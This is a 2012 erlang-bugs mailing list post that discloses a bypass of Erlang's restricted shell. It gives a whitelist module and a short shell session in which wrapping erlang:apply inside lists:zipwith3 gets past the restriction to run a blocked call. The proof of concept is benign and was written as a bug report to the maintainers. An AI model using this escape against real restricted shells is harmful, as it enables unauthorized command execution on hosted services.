[erlang-bugs] The Erlang Restricted Shell allows execution of random commands

Roberto Aloi <>
Tue Jan 31 12:46:24 CET 2012


Hi all,

reading from the Erlang doc:

http://www.erlang.org/doc/man/shell.html#start_restricted-1

"The shell may be started in a restricted mode. In this mode, the shell evaluates a function call only if allowed."

Let's write a minimal module which whitelists the 'lists' module only:

=====
-module(restrict).

-export([local_allowed/3, non_local_allowed/3]).

-define(NON_LOCAL_ALLOWED, [lists]).

local_allowed(_Cmd, _Args, State) ->
    {false, State}.

non_local_allowed({Module, _Function}, _Args, State) ->
    {lists:member(Module, ?NON_LOCAL_ALLOWED), State}.
=====

Let's then start a restricted shell, using the above module.

$ erlc restrict.erl
$ erl -stdlib restricted_shell restrict

Erlang R14B04 (erts-5.8.5) [source] [64-bit] [smp:4:4] [rq:4] [async-threads:0] [hipe] [kernel-poll:false]

Restricted Eshell V5.8.5  (abort with ^G)

And let's see if it works as expected.

1> erlang:time(). 
** exception exit: restricted shell does not allow time()

Cool.

2> erlang:apply(erlang, time, []).
** exception exit: restricted shell does not allow time()

Yeah.

3> F = fun (M,F,A) -> lists:zipwith3({erlang, apply}, [M], [F], [ A ]) end.
#Fun<erl_eval.18.59269574>
4> F(erlang, time, []).
[{12,35,45}]

Ooops.

Please notice that I'm not the one who actually discovered this bug (or is it a feature?). It was actually one of the tryerlang.org users, who kindly informed me about this. Originally I thought this was an application bug, but it is not. This is more generic and it affects the restricted shell itself.

Best regards,

Roberto Aloi
---
@robertoaloi
Erlang Solutions Ltd.
www.erlang-solutions.com



More information about the erlang-bugs mailing list